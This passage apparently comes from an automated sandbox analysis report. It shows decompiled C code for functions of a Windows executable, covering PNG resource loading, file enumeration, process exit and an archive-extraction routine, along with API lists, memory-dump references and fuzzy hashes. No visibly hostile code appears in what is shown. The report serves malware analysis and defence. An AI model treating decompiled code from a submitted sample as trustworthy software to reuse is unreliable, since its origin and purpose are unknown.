				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E009FEA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0xa1dff8() == 0) {
						_t26 = E009F95CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L009FD81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}





















                            0x009f964b
                            0x009f9651
                            0x009f9655
                            0x009f9732
                            0x009f9732
                            0x009f9669
                            0x009f966d
                            0x009f968d
                            0x009f968d
                            0x009f972f
                            0x00000000
                            0x009f972f
                            0x009f9676
                            0x009f967e
                            0x00000000
                            0x00000000
                            0x009f9681
                            0x009f9687
                            0x009f968b
                            0x009f969b
                            0x009f969f
                            0x009f96a5
                            0x009f96a9
                            0x009f9729
                            0x009f9729
                            0x00000000
                            0x009f972e
                            0x009f96b4
                            0x009f9722
                            0x009f9723
                            0x00000000
                            0x009f9723
                            0x009f96b9
                            0x009f96c1
                            0x009f96c9
                            0x009f96ca
                            0x009f96cb
                            0x009f96d4
                            0x009f96db
                            0x009f96e0
                            0x009f96e4
                            0x009f96e9
                            0x009f96ee
                            0x009f96f3
                            0x009f96f8
                            0x009f96fa
                            0x009f96ff
                            0x009f9703
                            0x009f9704
                            0x009f9707
                            0x009f970e
                            0x009f9710
                            0x009f9710
                            0x009f970e
                            0x009f9719
                            0x009f9719
                            0x009f96ee
                            0x009f971c
                            0x00000000
                            0x009f971c
                            0x00000000

                            APIs
                            • FindResourceW.KERNEL32(00000066,PNG,?,?,009FA54A,00000066), ref: 009F964B
                            • SizeofResource.KERNEL32(00000000,74855B70,?,?,009FA54A,00000066), ref: 009F9663
                            • LoadResource.KERNEL32(00000000,?,?,009FA54A,00000066), ref: 009F9676
                            • LockResource.KERNEL32(00000000,?,?,009FA54A,00000066), ref: 009F9681
                            • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,009FA54A,00000066), ref: 009F969F
                            • GlobalLock.KERNEL32 ref: 009F96AC
                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009F9707
                            • GlobalUnlock.KERNEL32(00000000), ref: 009F971C
                            • GlobalFree.KERNEL32 ref: 009F9723
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                            • String ID: PNG
                            • API String ID: 4097654274-364855578
                            • Opcode ID: d5abfbc7d6b9319f608b33af3c76ffea182401785a5227eca6372091970b293c
                            • Instruction ID: e8ed14af49f170a55e35a5cb44df4f9fdeaac0ef06c6e27664e43860adc20920
                            • Opcode Fuzzy Hash: d5abfbc7d6b9319f608b33af3c76ffea182401785a5227eca6372091970b293c
                            • Instruction Fuzzy Hash: 2C218F7161131AABD721EFA1DC88F7B7BADEF85790B114528FA41C2161DB31CC16CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EA2DF, Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E009EA2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E009FD940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E009EFAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E009EB9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E009F0A81(_t84 + 0x1010, _t82,  &_v4);
						E009F0A81(_t84 + 0x1018, _t82,  &_v24);
						E009F0A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E009EB32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}






















                            0x009ea2df
                            0x009ea2e4
                            0x009ea2ea
                            0x009ea2ec
                            0x009ea2f8
                            0x009ea2ff
                            0x009ea302
                            0x009ea305
                            0x009ea37a
                            0x009ea380
                            0x009ea382
                            0x009ea384
                            0x009ea386
                            0x009ea38c
                            0x009ea38f
                            0x009ea38f
                            0x009ea392
                            0x009ea392
                            0x009ea398
                            0x009ea39a
                            0x00000000
                            0x00000000
                            0x009ea307
                            0x009ea314
                            0x009ea316
                            0x009ea31a
                            0x009ea3a0
                            0x009ea3ae
                            0x009ea3b3
                            0x009ea3ba
                            0x009ea3c5
                            0x009ea3c5
                            0x009ea3c9
                            0x009ea3d3
                            0x009ea3d6
                            0x009ea3e0
                            0x009ea3ea
                            0x009ea3f4
                            0x009ea3fe
                            0x009ea408
                            0x009ea412
                            0x009ea41c
                            0x009ea429
                            0x009ea439
                            0x009ea449
                            0x009ea320
                            0x009ea33b
                            0x009ea352
                            0x009ea352
                            0x009ea35b
                            0x009ea36c
                            0x009ea36c
                            0x009ea367
                            0x009ea369
                            0x009ea369
                            0x009ea36e
                            0x009ea33d
                            0x009ea34a
                            0x009ea34c
                            0x009ea350
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ea350
                            0x009ea33b
                            0x009ea31a
                            0x009ea44e
                            0x009ea461

                            APIs
                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009EA1DA,000000FF,?,?), ref: 009EA314
                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009EA1DA,000000FF,?,?), ref: 009EA34A
                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009EA1DA,000000FF,?,?), ref: 009EA352
                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,009EA1DA,000000FF,?,?), ref: 009EA37A
                            • GetLastError.KERNEL32(?,?,?,?,009EA1DA,000000FF,?,?), ref: 009EA386
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileFind$ErrorFirstLast$Next
                            • String ID:
                            • API String ID: 869497890-0
                            • Opcode ID: 3ac28b69cd56875973a46b8a8027b27dae4e9d20fb31cfeca3356d59e07377cf
                            • Instruction ID: 43b7c134270e1637a4b535f6a35d9b6050470ff0b983aa3d847f5c8bfabb4096
                            • Opcode Fuzzy Hash: 3ac28b69cd56875973a46b8a8027b27dae4e9d20fb31cfeca3356d59e07377cf
                            • Instruction Fuzzy Hash: B6418076604385AFC325EF65C884AEAF7ECBB88340F004A2AF599D3251D774ED54CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A06AF3, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A06AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E00A09D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00A06B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                            0x00a06aff
                            0x00a06b1b
                            0x00a06b1b
                            0x00a06b24
                            0x00a06b2d

                            APIs
                            • GetCurrentProcess.KERNEL32(00000003,?,00A06AC9,00000003,00A1A800,0000000C,00A06C20,00000003,00000002,00000000,?,00A07B1A,00000003), ref: 00A06B14
                            • TerminateProcess.KERNEL32(00000000,?,00A06AC9,00000003,00A1A800,0000000C,00A06C20,00000003,00000002,00000000,?,00A07B1A,00000003), ref: 00A06B1B
                            • ExitProcess.KERNEL32 ref: 00A06B2D
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 6e577480f81e918fa84a0b5a1d1e176795374632d1c8b85ab1b0f13ff4581d40
                            • Instruction ID: d83aee174c268bfe634de2095d533ba34ac1e2baa59765f358a1ea326105dad2
                            • Opcode Fuzzy Hash: 6e577480f81e918fa84a0b5a1d1e176795374632d1c8b85ab1b0f13ff4581d40
                            • Instruction Fuzzy Hash: EFE0B67508020CABCF11AFA4EE49A993F69EB45785B008514FA098A172CB35DD62CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E83C0, Relevance: 3.9, APIs: 2, Instructions: 940COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E009E83C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E009FD870(E00A112F2, _t706);
				E009FD940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E009E5C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E009E1F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E009EAFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E009E2005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E009EB8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E009EB8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E009F0FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E009E80B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E009E6EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E009EA1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E009E7BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E009E807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E009EC634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L009EE724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E009E943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E009E2005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E009E946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E009E1E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E009EA728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E009EA728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E009EC67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E009F2842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E009F24D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff);
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E009E910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E009E1E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E009EA12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E009E6BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E009E9BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E009E9A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E009E94DA(_t340);
																																						E009E7A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
